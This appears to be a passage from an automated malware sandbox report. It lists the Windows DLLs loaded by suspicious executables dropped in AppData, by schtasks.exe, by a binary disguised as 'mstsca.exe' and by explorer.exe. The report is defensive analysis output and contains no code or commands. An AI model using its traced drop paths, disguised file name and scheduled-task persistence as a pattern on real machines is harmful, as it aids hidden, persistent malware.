Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\rujtcgu Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\rujtcgu Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: ninput.dll
Source: C:\Windows\explorer.exe Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe Section loaded: slc.dll
Source: C:\Windows\explorer.exe Section loaded: sppc.dll
Source: C:\Windows\explorer.exe Section loaded: profapi.dll
Source: C:\Windows\explorer.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe Section loaded: idstore.dll
Source: C:\Windows\explorer.exe Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe Section loaded: samcli.dll
Source: C:\Windows\explorer.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe Section loaded: winsta.dll
Source: C:\Windows\explorer.exe Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe Section loaded: devobj.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe Section loaded: appextension.dll
Source: C:\Windows\explorer.exe Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe Section loaded: languageoverlayutil.dll
Source: C:\Windows\explorer.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe Section loaded: edputil.dll
Source: C:\Windows\explorer.exe Section loaded: twinui.pcshell.dll
Source: C:\Windows\explorer.exe Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe Section loaded: wincorlib.dll
Source: C:\Windows\explorer.exe Section loaded: cdp.dll
Source: C:\Windows\explorer.exe Section loaded: dsreg.dll
